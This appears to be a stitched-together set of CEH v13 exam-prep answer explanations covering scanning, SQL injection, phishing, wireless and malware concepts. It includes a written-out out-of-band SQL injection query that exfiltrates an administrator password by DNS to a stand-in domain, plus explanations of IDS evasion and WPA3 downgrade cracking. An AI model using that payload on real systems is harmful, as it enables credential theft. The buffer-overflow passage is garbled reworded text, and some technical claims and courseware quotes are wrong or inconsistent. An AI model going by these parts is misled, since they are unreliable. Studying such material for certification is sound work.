Corrupting or erasing event logs ensures that system administrators or forensic investigators cannot trace the intrusion or determine how the system was compromised.

Incorrect Options:

A. Creating a backdoor is part of the "Maintaining Access" phase, not "Clearing Tracks."

B. Injecting a rootkit is part of the "Gaining or Maintaining Access" stage.

C. Exploiting a vulnerability is part of the "Gaining Access" phase.

Reference – CEH v13 Official Courseware:

Module 05: System Hacking

Section: “Clearing Logs and Erasing Evidence”

Subsection: “Track-Clearing Techniques”

Lab: Log Manipulation and Covering Tracks

NOTE: In my opinion, this is an absolutely wrong statement of the question. But you may come across a question with a similar wording on the exam. What does "fast" mean? If we want to increase the speed and intensity of the scan we can select the mode using the -T flag (0/1/2/3/4/5). At high -T values, we will sacrifice stealth and gain speed, but we will not limit functionality.

«nmap -T4 -F 10.10.0.0/24» This option is "correct" because of the -F flag.

-F (Fast (limited port) scan)

Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100.

Technically, scanning will be faster, but just because we have reduced the number of ports by 10 times, we are just doing 10 times less work, not faster.

Blind SQL Injection is a type of SQL injection attack where no error messages or data are directly returned to the attacker. Instead, the attacker sends specially crafted SQL queries that result in true or false responses. Based on how the application responds (such as redirecting to a different page or loading time), the attacker infers information about the backend database.

According to CEH v13:

Blind SQLi is used when standard SQL injection yields no visible output.

It comes in two forms:

Boolean-based: Infers information based on application behavior.

Time-based: Infers information based on server response time delays.

Incorrect Options:

A. Time-based SQLi is a sub-type of Blind SQLi, but the question describes Boolean-based behavior.

B. Union SQL injection uses the UNION keyword to fetch additional rows; requires visible output.

C. Error-based SQL injection relies on database error messages.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Types of SQL Injection”

Subsection: “Blind SQL Injection (Boolean and Time-Based)”

===========

According to CEH v13 Module 09: Social Engineering, Whaling is a specific type of phishing attack that targets senior executives and high-value individuals.

It’s called “whaling” because these individuals are the “big fish.”

Attacks are highly targeted and customized, often using knowledge of the executive’s company, responsibilities, or communication style.

The goal is to gain access to sensitive systems, financial assets, or confidential data.

Option Breakdown:

A. Spear phishing: Targeted phishing but not necessarily aimed at high-profile executives.

B. Whaling: Correct – phishing directed at C-level or VIP targets.

C. Vishing: Voice phishing – conducted over telephone/VoIP.

D. Phishing: General term – broader category.

Padding oracle attacks exploit systems that reveal differences in error responses when incorrectly padded ciphertext is submitted. CEH explains that these variations allow attackers to iteratively determine valid padding bytes and ultimately decrypt or modify encrypted data without knowledge of the key.

The phrase "testing the network using the same methodologies and tools employed by attackers" precisely describes Penetration Testing.

Penetration testing involves:

Simulating real-world attacks.

Using tools and techniques similar to those used by malicious hackers.

Actively exploiting vulnerabilities to assess the security posture of systems.

From CEH v13 Courseware:

Module 1: Introduction to Ethical Hacking

Module 5: Vulnerability Assessment vs. Penetration Testing

CEH v13 Study Guide states:

“Penetration testing is a simulated cyberattack against your system to check for exploitable vulnerabilities. It uses the same tools, techniques, and processes as attackers to find and validate security weaknesses.”

Incorrect Options:

A. Vulnerability Scanning: Only identifies potential issues; it doesn’t attempt to exploit them.

C. Security Policy Implementation: Refers to governance and documentation, not testing.

D. Designing Network Security: Refers to planning a secure architecture.

Without documented approval, the firewall rule could represent an unauthorized change or security risk. Rolling it back until proper change control processes are followed is consistent with best practices in security governance.

CEH v13 Reference:

Module 1: Introduction to Ethical Hacking

"Unauthorized changes to security devices should be immediately reviewed and reverted until formal approval is obtained."

━━━━━━━━━━━━━━━━━━━━━━

In CEH v13 Module 13: Hacking Web Applications, Server-Side Includes (SSI) is defined as a method for dynamically generating web content through directives embedded in HTML files.

stm File Extension:

Associated with Server Side Includes (SSI).

Files like .stm, .shtml, and .shtm can embed server-side directives.

Vulnerable if user input is improperly handled, allowing command injection or arbitrary file access.

Option Clarification:

A. .stm: Correct – indicates SSI is enabled.

B. .html: Static file, not associated with SSI.

C. .rss: XML feed; irrelevant to SSI.

D. .cms: Generic; doesn’t indicate SSI functionality.

The hosts file on a computer maps domain names to IP addresses locally. By modifying this file, an attacker can redirect traffic destined for legitimate sites (e.g., to malicious IP addresses (e.g., a phishing server).

The hosts file takes precedence over DNS queries, making it a simple but powerful tool for local redirection.

Windows hosts file location: C:\Windows\System32\drivers\etc\hosts

Linux/Unix hosts file location: /etc/hosts

Reference – CEH v13 Official Study Guide:

Module 6: Malware Threats

Quote:

“Attackers can redirect users to phishing or malware sites by altering the local hosts file, bypassing DNS resolution.”

Incorrect Options:

A. boot.ini is for boot configuration, not DNS resolution.

B. sudoers controls administrative privileges in Linux.

C. networks is for defining network names, not URL resolution.

===========

Comprehensive and Detailed Explanation:

SIEM (Security Information and Event Management) systems aggregate logs and alerts from across the network—servers, routers, firewalls, IDS/IPS, and applications—and correlate that data to identify suspicious or malicious activity.

They provide:

Real-time alerting

Long-term log storage

Compliance reporting

Incident response facilitation

From CEH v13 Courseware:

Module 12: Evading IDS, Firewalls, and Honeypots → SIEM Tools

The Snort rule in the image is detecting suspicious bind attempts over DCERPC (Distributed Computing Environment/Remote Procedure Call), specifically targeting ports 135 (RPC) and 445 (SMB) with crafted content. The rule references CVE CAN-2003-0352.

CVE-2003-0352 is associated with the DCOM RPC vulnerability in Microsoft Windows that was exploited by the MS Blaster (also known as Lovsan) worm in 2003.

Key Indicators from the Snort Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 135

content includes DCERPC binding pattern (|05| and |0b| with specific binary patterns)

Reference to CVE-2003-0352

Class type: attempted-admin

The MS Blaster worm exploited this vulnerability by sending a specially crafted RPC request to port 135, allowing remote code execution.

From CEH v13 Courseware:

Module 6: Malware Threats

Module 11: Session Hijacking

Discussion of historic worms and their exploit signatures, including MS Blaster.

Incorrect Options:

A. WebDav: Typically uses HTTP/HTTPS and was exploited by Nimda.

B. SQL Slammer: Targeted UDP port 1434 (SQL Server), not TCP 135/445.

D. MyDoom: Spread via email and exploited Windows file-sharing mechanisms (port 3127), not DCERPC.

CEH training emphasizes that highly tailored social engineering attacks—those exploiting trust in internal workflows and perceived technical authority—are far more effective than generic or mass-distributed phishing attempts. A fake IT support portal that mirrors internal systems leverages procedural familiarity: IT departments commonly instruct employees to log into support portals for troubleshooting, credential verification, or ticket updates. When the attacker enhances the pretext with insider terminology and references to real internal systems, employees are more likely to trust the portal and enter credentials. CEH highlights that successful social engineering attacks mimic legitimate processes to avoid suspicion. Phone calls posing as executives often introduce risk due to real-time interaction and scrutiny. Generic phishing lacks personalization and is easily detected. Physical impersonation introduces operational risk and may not yield credentials. Therefore, a fake IT support portal aligned with IT workflows is the optimal method.

tcptrace is a command-line tool used to analyze the output of packet-capture tools such as tcpdump and Wireshark. It processes the captured data and generates detailed reports on TCP connections including connection durations, round-trip times, throughput, and more.

???? Reference – CEH v13 Study Guide, Module 10: Sniffing

“tcptrace reads in packet trace files and outputs information about each TCP connection seen.”

❌ Incorrect options:

B. Nessus is a vulnerability scanner.

C. OpenVAS is also a vulnerability assessment tool.

D. tcptraceroute is used to trace the path of packets at the TCP level, not for analyzing captured data.

The PSH (Push) flag in TCP instructs the sending system to:

Immediately deliver data to the application.

Avoid waiting for additional buffered data to form a full segment.

This is important in interactive communications like Telnet or SSH, where the delay in transmission would degrade the user experience.

From CEH v13 Courseware:

Module 3: Scanning Networks → TCP Flags and Packet Structure

CEH v13 explains that WPA3 introduces SAE (Simultaneous Authentication of Equals), which resists traditional offline dictionary and brute-force attacks by removing crackable handshake material. Because WPA3 prevents attackers from capturing a reusable handshake, the most practical offensive method is to force a downgrade attack, tricking clients into associating using WPA2 instead of WPA3. Once the victim reconnects under WPA2-PSK, the attacker captures the standard 4-way handshake, which can then be cracked offline using dictionary or GPU-accelerated brute-force methods. CEH discusses downgrade attacks as a significant real-world threat when mixed-mode configurations are enabled or when access points fail to enforce strict WPA3-only operation. Options B and C are ineffective because WPA3 handshake materials cannot be brute-forced offline. Option D is unrelated to Wi-Fi encryption. Downgrading to WPA2 is the most effective and widely documented attack path.

CEH defines spyware as malware designed to covertly observe user behavior and transmit sensitive information to attackers without the victim’s knowledge. Spyware commonly records keystrokes, browser activity, form submissions, application usage, and other personally identifiable information. CEH highlights that spyware often operates silently and may disguise itself as legitimate software, making detection difficult. Unlike rootkits—which hide processes and files—or worms that self-replicate, spyware focuses exclusively on monitoring and data exfiltration. It is frequently installed through phishing, drive-by downloads, browser vulnerabilities, or malicious installers. Spyware can serve as a stepping stone for further system compromise by providing attackers with credentials for privilege escalation, lateral movement, or financial theft. CEH emphasizes the need for endpoint hardening, updated anti-malware engines, and behavioral analysis tools to detect such stealthy monitoring programs.

In CEH v13 Module 02: Footprinting and Reconnaissance, and Module 03: Scanning Networks, several tools and techniques are introduced for analyzing public IP addresses when investigating a security alert.

Let’s evaluate the options:

A. DNS: Domain Name System (DNS) is essential in mapping IPs to domains. Reverse DNS lookups can reveal if the IP is associated with a malicious domain, and forward lookups can confirm legitimacy.

B. Whois: WHOIS records are crucial for identifying IP ownership, registration data, and abuse contacts. It helps assess if the IP belongs to a known threat actor or suspicious hosting provider.

C. Geolocation: Helps you understand where the IP is physically located. If the IP is in a country known for cybercrime or doesn’t match your user's location, it raises red flags.

D. ARP (Address Resolution Protocol): ❌ ARP is local to Layer 2 and works only within a LAN (Local Area Network). ARP cannot resolve or analyze public IP addresses which operate in Layer 3 of the OSI model.

Thus, ARP is the least relevant when analyzing a public IP address, as it deals with MAC-to-IP mapping only in local environments.

DNS poisoning (also known as DNS cache poisoning) occurs when a malicious actor injects false DNS data into a DNS resolver's cache. The poisoned entry will persist for the duration of its TTL (Time To Live), which is defined in the DNS SOA (Start of Authority) record.

The SOA record contains several fields including:

Serial number

Refresh

Retry

Expire

Minimum TTL

The Minimum TTL value in the SOA record determines how long a DNS resolver should cache the DNS data — including any potentially poisoned data.

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration & Poisoning

CEH v13 Study Guide states:

“The SOA record includes a minimum TTL value that dictates how long DNS information should be cached by other DNS servers. If DNS cache poisoning occurs, the false information will persist until the TTL expires.”

Incorrect Options:

A: MX (Mail Exchange) defines mail servers, not TTLs.

C: NS (Name Server) specifies authoritative servers, not caching durations.

D: TIMEOUT is not a valid DNS resource record.

In ethical hacking and penetration testing, assessing the security posture of a target system requires direct technical interaction with that system. The combination of techniques in option D—port scanning, banner grabbing, and service identification—provides actionable and detailed insight into the system’s vulnerabilities, services, and configurations.

According to CEH v13 Official Courseware:

Port scanning is the process of identifying open ports and the services running on them. It reveals:

Which ports are open or closed

The operating system's response behavior

Entry points for possible exploitation

Banner grabbing involves connecting to open services to retrieve application-level information. This can expose:

Software version numbers

Server type and configuration

Security misconfigurations

Service identification allows the security professional to determine what protocols and services (HTTP, FTP, SSH, etc.) are active and how they are configured. This supports:

Vulnerability analysis

Risk evaluation

Threat modeling

These combined techniques are fundamental steps in the reconnaissance and scanning phases of the ethical hacking lifecycle.

Incorrect Options:

A. Phishing, spamming, sending trojans are offensive tactics used in attacks; they provide limited direct system analysis and do not measure technical posture directly.

B. Social engineering, site browsing, and tailgating are physical or psychological attack vectors, not direct technical assessments.

C. Wardriving and warchalking identify wireless networks but offer limited detail about internal system configurations or vulnerabilities.

Reference – CEH v13 Official Study Material:

Module 03: Scanning Networks

Section: “Types of Scanning”

Subsections: “Port Scanning,” “Banner Grabbing,” and “Service Version Detection”

CEH Engage: Scanning and Enumeration labs

CEH Official Exam Blueprint: Knowledge Area — “Footprinting and Reconnaissance” and “Scanning Networks”

These techniques are emphasized as foundational components in any network vulnerability assessment.

The ntpq utility provides detailed NTP peer information, synchronization states, offsets, delays, and strata. CEH specifically lists ntpq as the tool for querying NTP daemon status and enumerating peer relationships, making it essential for reconnaissance and lateral movement mapping.

Well-known and widely used password-cracking tools include:

A. L0phtcrack – Windows password auditing tool that can crack LM and NTLM hashes.

E. John the Ripper – Versatile password cracker that supports many hash types on Unix, Windows, etc.

Incorrect Options:

B. NetCat – A network tool used for port scanning and data transfer.

C. “Jack the Ripper” is likely a mistaken reference to John the Ripper.

D. Netbus – A remote access Trojan, not a password cracker.

From CEH v13 Courseware:

Module 6: Password Cracking Tools

CEH v13 defines a penetration tester as an authorized security professional whose responsibility is to identify, exploit, and report vulnerabilities within an organization’s systems, networks, applications, and processes. Unlike malicious hackers, penetration testers operate strictly within legal boundaries, under documented Rules of Engagement (RoE), and with explicit written permission from the organization. Their goal is not to harm systems but to simulate real-world cyberattacks to help organizations strengthen their defenses. CEH emphasizes the ethical responsibilities of penetration testers, including maintaining confidentiality, avoiding unauthorized data exposure, ensuring minimal operational impact, and providing actionable recommendations. Options B, C, and D describe malicious actors, malware authors, or unauthorized attackers—roles opposite to that of an ethical penetration tester. CEH makes a strong distinction between white-hat ethical hackers and black-hat attackers, with penetration testers firmly falling under the ethical, lawful category. Therefore, Option A accurately reflects CEH’s definition of a penetration tester.

Weaponization

The adversary analyzes the data collected in the previous stage to identify the

vulnerabilities and techniques that can exploit and gain unauthorized access to the

target organization. Based on the vulnerabilities identified during analysis, the adversary

selects or creates a tailored deliverable malicious payload (remote-access malware

weapon) using an exploit and a backdoor to send it to the victim. An adversary may

target specific network devices, operating systems, endpoint devices, or even

individuals within the organization to carry out their attack. For example, the adversary

may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary: o Identifying appropriate malware payload based on the analysis o Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability

o Creating a phishing email campaign o Leveraging exploit kits and botnets

The Cyber Kill Chain consists of 7 steps: Reconnaissance, weaponization, delivery, exploitation, installation, command and control, and finally, actions on objectives. Below you can find detailed information on each.

1. Reconnaissance: In this step, the attacker/intruder chooses their target. Then they conduct in-depth research on this target to identify its vulnerabilities that can be exploited.

2. Weaponization: In this step, the intruder creates a malware weapon like a virus, worm, or such to exploit the target's vulnerabilities. Depending on the target and the purpose of the attacker, this malware can exploit new, undetected vulnerabilities (also known as the zero-day exploits) or focus on a combination of different vulnerabilities.

3. Delivery: This step involves transmitting the weapon to the target. The intruder/attacker can employ different USB drives, e-mail attachments, and websites for this purpose.

4. Exploitation: In this step, the malware starts the action. The program code of the malware is triggered to exploit the target’s vulnerability/vulnerabilities.

5. Installation: In this step, the malware installs an access point for the intruder/attacker. This access point is also known as the backdoor.

6. Command and Control: The malware gives the intruder/attacker access to the network/system.

7. Actions on Objective: Once the attacker/intruder gains persistent access, they finally take action to fulfill their purposes, such as encryption for ransom, data exfiltration, or even data destruction.

Risk Mitigation

Risk mitigation can be defined as taking steps to reduce adverse effects. There are four types of risk mitigation strategies that hold unique to Business Continuity and Disaster Recovery. When mitigating risk, it’s important to develop a strategy that closely relates to and matches your company’s profile.

Risk Acceptance

Risk acceptance does not reduce any effects; however, it is still considered a strategy. This strategy is a common option when the cost of other risk management options such as avoidance or limitation may outweigh the cost of the risk itself. A company that doesn’t want to spend a lot of money on avoiding risks that do not have a high possibility of occurring will use the risk acceptance strategy.

Risk Avoidance

Risk avoidance is the opposite of risk acceptance. It is the action that avoids any exposure to the risk whatsoever. It’s important to note that risk avoidance is usually the most expensive of all risk mitigation options.

Risk Limitation

Risk limitation is the most common risk management strategy used by businesses. This strategy limits a company’s exposure by taking some action. It is a strategy employing a bit of risk acceptance and a bit of risk avoidance or an average of both. An example of risk limitation would be a company accepting that a disk drive may fail and avoiding a long period of failure by having backups.

Risk Transference

Risk transference is the involvement of handing risk off to a willing third party. For example, numerous companies outsource certain operations such as customer service, payroll services, etc. This can be beneficial for a company if a transferred risk is not a core competency of that company. It can also be used so a company can focus more on its core competencies.

Buffer overflow this attack is an anomaly that happens when software writing data to a buffer overflows the buffer’s capacity, leading to adjacent memory locations being overwritten. In other words, an excessive amount of information is being passed into a container that doesn’t have enough space, which information finishes up replacing data in adjacent containers.

Buffer overflows are often exploited by attackers with a goal of modifying a computer’s memory so as to undermine or take hold of program execution.

What’s a buffer?

A buffer, or data buffer, is a neighborhood of physical memory storage wont to temporarily store data while it’s being moved from one place to a different . These buffers typically sleep in RAM memory. Computers frequently use buffers to assist improve performance; latest hard drives cash in of buffering to efficiently access data, and lots of online services also use buffers. for instance , buffers are frequently utilized in online video streaming to stop interruption. When a video is streamed, the video player downloads and stores perhaps 20% of the video at a time during a buffer then streams from that buffer. This way, minor drops in connection speed or quick service disruptions won’t affect the video stream performance.

Buffers are designed to contain specific amounts of knowledge . Unless the program utilizing the buffer has built-in instructions to discard data when an excessive amount of is shipped to the buffer, the program will overwrite data in memory adjacent to the buffer.

Buffer overflows are often exploited by attackers to corrupt software. Despite being well-understood, buffer overflow attacks are still a serious security problem that torment cyber-security teams. In 2014 a threat referred to as ‘heartbleed’ exposed many many users to attack due to a buffer overflow vulnerability in SSL software.

How do attackers exploit buffer overflows?

An attacker can deliberately feed a carefully crafted input into a program which will cause the program to undertake and store that input during a buffer that isn’t large enough, overwriting portions of memory connected to the buffer space. If the memory layout of the program is well-defined, the attacker can deliberately overwrite areas known to contain executable code. The attacker can then replace this code together with his own executable code, which may drastically change how the program is meant to figure .

For example if the overwritten part in memory contains a pointer (an object that points to a different place in memory) the attacker’s code could replace that code with another pointer that points to an exploit payload. this will transfer control of the entire program over to the

attacker’s code.

According to CEH v13 Module 06: Malware Threats, when analyzing suspicious system behavior or investigating a suspected Trojan infection, a common and effective approach is to:

Monitor system activity and network behavior using tools like netstat, Wireshark, and TCPView.

Trojans often create covert channels or backdoors for remote access, which can be identified through unexpected or unauthorized outgoing connections to remote IP addresses or domains.

Using netstat -an or netstat -ano helps identify open ports and active connections, and checking these against known IPs can indicate whether a Trojan is communicating with a Command and Control (C&C) server.

Analysis of Each Option:

A. Use ExifTool and check for malicious content

Incorrect. ExifTool is primarily used for extracting metadata from files, especially images and documents. It is not effective for analyzing executable malware or system behavior post-execution.

B. You do not check; rather, you immediately restore a previous snapshot of the operating system

Incorrect. While restoring from a snapshot might eventually be required, immediate restoration without diagnosis is not a recommended or forensically sound first step. It also prevents root cause analysis.

C. Upload the file to VirusTotal

Partially correct but not sufficient. While uploading the file to VirusTotal is a good step to confirm if the file is known malware, it does not identify whether the machine is currently infected or actively compromised.

D. Use netstat and check for outgoing connections to strange IP addresses or domains

Correct. This method helps detect if the system is making suspicious external connections that are common in Trojan infections.

Reference from CEH v13 Study Guide and Course Materials:

CEH v13 Official Module 06 – Malware Threats, Section: Types of Malware – Trojans, and System Monitoring Tools

CEH v13 eCourseware Lab Manual: "Detecting Trojan Activity using netstat and TCPView"

CEH Engage Range: Malware Investigation Phase – Trojan Behavior Detection

CEH v13 distinguishes between vertical and horizontal privilege escalation. Vertical escalation occurs when an attacker moves upward in the hierarchy of privileges—such as from a regular user to an administrator or root—by exploiting vulnerabilities, misconfigurations, or insecure privilege boundaries. This allows the attacker to perform tasks that were previously restricted, such as modifying system settings, accessing sensitive data, installing malware, or controlling the entire environment. Horizontal escalation, on the other hand, involves accessing another user’s resources at the same privilege level, which the other options describe. Exploiting unquoted service paths or weak access controls may facilitate privilege abuse, but they do not inherently elevate the user to a higher privilege tier unless they specifically lead to administrative execution. The scenario that aligns perfectly with the CEH definition of vertical privilege escalation is the escalation from regular user to administrator.

Weaknesses of LM hashes include:

A. Passwords are converted to uppercase before hashing.

B. In older Windows systems, LM hashes were transmitted over the network, sometimes in plaintext (or easily intercepted).

D. Passwords are split into two 7-character chunks, which are hashed independently, reducing entropy.

From CEH v13 Courseware:

Module 6: Malware and Password Threats

Module 4: Windows Enumeration

Incorrect Option:

C: LM uses DES encryption with 56-bit keys (not 32-bit).

CEH v13 explains that WPA2-Enterprise replaces the static, shared password model of WPA2-Personal with a centralized authentication system that relies on the 802.1X framework. The essential component of this architecture is RADIUS integrated with EAP, which manages user authentication, device identity verification, and dynamic session key generation. RADIUS acts as the backend authentication server, while EAP provides a flexible authentication framework supporting certificates, smartcards, or credentials. This combination allows organizations to enforce per-user access control policies, revoke individual users without changing network-wide passwords, and generate unique Pairwise Master Keys (PMKs) for every authenticated session. CEH highlights that one of the major advantages of WPA2-Enterprise is its ability to produce unique encryption keys for each client, preventing key reuse and mitigating lateral movement if one device is compromised. Certificate-based EAP types such as EAP-TLS introduce mutual authentication, ensuring both client and server validate each other’s identity before allowing network access. This significantly increases security posture compared to PSK networks, which cannot scale securely for large enterprise deployments.

Bollards are short vertical posts installed to control or direct road traffic, but more importantly, they act as physical security controls to prevent vehicle-ramming attacks or unauthorized vehicle entry into sensitive or secure areas such as building entrances. They are often reinforced and strategically placed to withstand high-speed collisions.

This is a physical security control described in CEH v13 Module 01 (Introduction to Ethical Hacking) and further discussed in physical security best practices for preventing unauthorized physical access.

Incorrect Options:

B. Receptionist is a human control, not a physical barrier for vehicles.

C. Mantrap is used to control personnel access, not vehicle access.

D. Turnstile controls pedestrian entry, not vehicles.

Launching Fileless Malware through Phishing Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. Fileless malware exploits vulnerabilities in system tools to load and run malicious payloads on the victim’s machine to compromise the sensitive information stored in the process memory. (P.978/962)

Split DNS (also known as Split-Horizon DNS) is a configuration where internal users and external users receive different DNS responses. Typically, one DNS server resides in the DMZ for public access, and another is inside the network for internal name resolution.

???? Reference – CEH v13 Official Study Guide, Module 9: System Hacking / Perimeter Security

“Split DNS allows different DNS records to be presented based on whether the requester is from inside or outside the organization’s network.”

❌ Incorrect options:

A. DynDNS is a dynamic DNS provider.

B. DNS Scheme is a non-standard term.

C. DNSSEC is a security extension for DNS, not a deployment model.

The most effective evasion technique to bypass the IDS signature detection while performing a SQL Injection attack is to leverage string concatenation to break identifiable keywords. This technique involves splitting SQL keywords or operators into smaller parts and joining them with string concatenation operators, such as ‘+’ or ‘||’. This way, the SQL query can still be executed by the database engine, but the IDS cannot recognize the keywords or operators as malicious, as they are hidden within strings. For example, the hacker could replace the keyword ‘OR’ with ‘O’||‘R’ or ‘O’+‘R’ in the SQL query, and the IDS would not be able to match the signature of a typical SQL injection pattern12.

The other options are not as effective as option D for the following reasons:

A. Implement case variation by altering the case of SQL statements: This option is not effective because most SQL engines and IDS systems are case-insensitive, meaning that they treat SQL keywords and operators the same regardless of their case. Therefore, altering the case of SQL statements would not help evade the IDS signature detection, as the IDS would still be able to match the signature of a typical SQL injection pattern3.

B. Employ IP fragmentation to obscure the attack payload: This option is not applicable because IP fragmentation is a network-level technique that splits IP packets into smaller fragments to fit the maximum transmission unit (MTU) of the network. IP fragmentation does not affect the content or structure of the SQL query, and it does not help evade the IDS signature detection, as the IDS would still be able to reassemble the fragments and match the signature of a typical SQL injection pattern4.

C. Use Hex encoding to represent the SQL query string: This option is not feasible because Hex encoding is a method of representing binary data in hexadecimal format, such as ‘0x41’ for ‘A’. Hex encoding does not work for SQL queries, as the SQL engine would not be able to interpret the hexadecimal values as valid SQL syntax. Moreover, Hex encoding would not help evade the IDS signature detection, as the IDS would still be able to decode the hexadecimal values and match the signature of a typical SQL injection pattern.

Comprehensive and Detailed Explanation From CEH v13 Guide:

Vulnerability identification is the step in the risk assessment process where security flaws or weaknesses are identified in existing systems, policies, or procedures.

CEH v13 Reference:

Module 5: Vulnerability Assessment – Risk Assessment Concepts

“Vulnerability identification is the process of discovering existing flaws and weaknesses in systems or processes that may be exploited.”

=============================================================

These types of attacks occur when faults or glitches are INJECTED into the Power supply that can be used for remote execution.

Web server footprinting is part of the reconnaissance phase in ethical hacking. It involves gathering detailed information about a web server’s structure, external links, available directories, scripts, and technologies in use.

Techniques include:

Spidering the site to map all accessible URLs and file paths

Identifying hidden directories or backup files

Analyzing page structures and URL patterns

This information helps attackers identify areas to target for further scanning or exploitation.

Incorrect Options:

A. Vulnerability scanning is active testing, not passive footprinting.

C. System-level data is gathered in OS or network footprinting.

D. Brute-force attacks are exploitation techniques, not reconnaissance.

Reference – CEH v13 Official Courseware:

Module 02: Footprinting and Reconnaissance

Section: “Web Server Footprinting Techniques”

Tool Reference: HTTrack, Burp Spider, OWASP ZAP

===========

CEH teaches that certain advanced intrusion evasion techniques rely on understanding how firewalls differentiate between new connections and established traffic. Most perimeter firewalls scrutinize SYN packets and initial HTTP requests but allow ACK packets from established sessions to pass with minimal filtering. ACK tunneling leverages this behavior by embedding malicious payloads inside ACK packets, which appear to be part of a legitimate, pre-established session. Because ACK packets are often considered "safe," they bypass deep inspection engines, intrusion detection systems, and application-layer gateways. This method allows attackers to move data or commands covertly between compromised internal systems and external hosts. CEH references such evasion strategies when discussing bypassing stateful firewalls and making malicious traffic appear legitimate. Port knocking and SYN scans would initiate new connections—precisely what the firewall is heavily inspecting. ICMP flooding is noisy and easily detected. ACK tunneling is specifically designed for stealth and is aligned with red team tradecraft for avoiding packet-level inspection mechanisms.

An ‘out-of-band’ SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control1. This technique can be used to bypass input validation and pattern matching measures that are based on the application’s responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type123. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database:

SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.example.com\\\\test.txt'))

This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator’s password1.

CEH categorizes spear phishing as a highly targeted, research-driven social engineering technique that tailors the message to the victim’s role, responsibilities, and current organizational activities. When attackers reference specific internal projects, personnel names, vendor relationships, or operational details, the message appears authentic and bypasses normal suspicion. Executives are especially vulnerable because they routinely receive sensitive operational updates and work closely with vendors and partners, making them prime targets for tailored deception. CEH stresses that spear phishing is significantly more effective than generic phishing because personalization increases trust. Social media-based attempts and mass phishing lack specificity and raise suspicion. Impersonating the CEO over the phone is riskier and more detectable due to real-time human interaction. A targeted spear-phishing email referencing internal projects best aligns with CEH-described advanced social engineering strategy.

Internet of Medical Things (IoMT) devices are internet-connected medical devices that can collect, transfer, and analyze data over a network. They can provide improved patient care and comfort, but they also pose security challenges and risks, as they can be targeted by cyberattacks, such as ransomware, that can compromise their functionality, integrity, or confidentiality. Ransomware is a type of malware that encrypts the victim’s data or system and demands a ransom for its decryption or restoration. Ransomware attacks can cause serious harm to healthcare organizations, as they can disrupt their operations, endanger their patients, and damage their reputation.

To protect IoMT devices from ransomware attacks, the main recommendation is to use network segmentation to isolate IoMT devices from the main network. Network segmentation is a technique that divides a network into smaller subnetworks, each with its own security policies and controls. Network segmentation can prevent or limit the spread of ransomware from one subnetwork to another, as it restricts the communication and access between them. Network segmentation can also improve the performance, visibility, and manageability of the network, as it reduces the network congestion, complexity, and noise.

The other options are not as effective or feasible as network segmentation. Implementing multi-factor authentication for all IoMT devices may not be possible or practical, as some IoMT devices may not support or require user authentication, such as sensors or monitors. Disabling all wireless connectivity on IoMT devices may not be desirable or realistic, as some IoMT devices rely on wireless communication protocols, such as Wi-Fi, Bluetooth, or Zigbee, to function or transmit data. Regularly changing the IP addresses of all IoMT devices may not prevent or deter ransomware attacks, as ransomware can target devices based on other factors, such as their domain names, MAC addresses, or vulnerabilities. References:

What Is Internet of Medical Things (IoMT) Security?

5 Steps to Secure Internet of Medical Things Devices

Ransomware in Healthcare: How to Protect Your Organization

[Network Segmentation: Definition, Benefits, and Best Practices]

In CEH v13 Module 05: System Hacking, and Module 14: Access Control, Identity Management, and Cryptography, Single Sign-On (SSO) is defined as a system that allows users to authenticate once and gain access to multiple systems without re-entering credentials.

SSO uses a Central Authentication Server (CAS).

Common technologies: Kerberos, OAuth, SAML, AD Federation Services.

Improves user convenience and centralized credential management.

STP prevents bridging loops in a redundant switched network environment. By avoiding loops, you can ensure that broadcast traffic does not become a traffic storm.

STP is a hierarchical tree-like topology with a “root” switch at the top. A switch is elected as root based on the lowest configured priority of any switch (0 through 65,535). When a switch boots up, it begins a process of identifying other switches and determining the root bridge. After a root bridge is elected, the topology is established from its perspective of the connectivity. The switches determine the path to the root bridge, and all redundant paths are blocked. STP sends configuration and topology change notifications and acknowledgments (TCN/TCA) using bridge protocol data units (BPDU).

An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker’s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes. An attacker using STP network topology changes to force its host to be elected as the root bridge.

In CEH v13 Module 03: Scanning Networks, Nmap's evasion techniques are discussed for bypassing or confusing Intrusion Detection Systems (IDS) and firewalls.

The -D option in Nmap is used to enable decoy scanning. It inserts false IP addresses in the scan to obfuscate the true origin of the scan.

This technique helps in masking the attacker’s IP and can confuse IDS logs.

Option Clarification:

A. -n/-R: Disables DNS resolution (-n) or uses reverse DNS (-R), does not evade detection.

B. -0N/-0X/-0G: Output formats (normal, XML, grepable), not related to evasion.

C. -T: Controls timing (e.g., -T0 is stealthy, -T5 is aggressive), but not explicitly for IDS evasion.

D. -D: Correct. Used for IDS/firewall evasion by using decoy IPs.

In CEH v13 Module 11: Hacking Wireless Networks, WPA3 is presented as the latest Wi-Fi security protocol, and it includes:

Simultaneous Authentication of Equals (SAE) protocol — a more secure key exchange mechanism.

Replaces WPA2's Pre-Shared Key (PSK) method to prevent dictionary and key recovery attacks.

SAE (a.k.a. Dragonfly) prevents attackers from capturing handshakes for offline cracking.

Option Clarification:

A. WEP: Obsolete and weak.

B. WPA: Early improvement over WEP, still vulnerable.

C. WPA2: Uses PSK and vulnerable to key reinstallation attacks (KRACK).

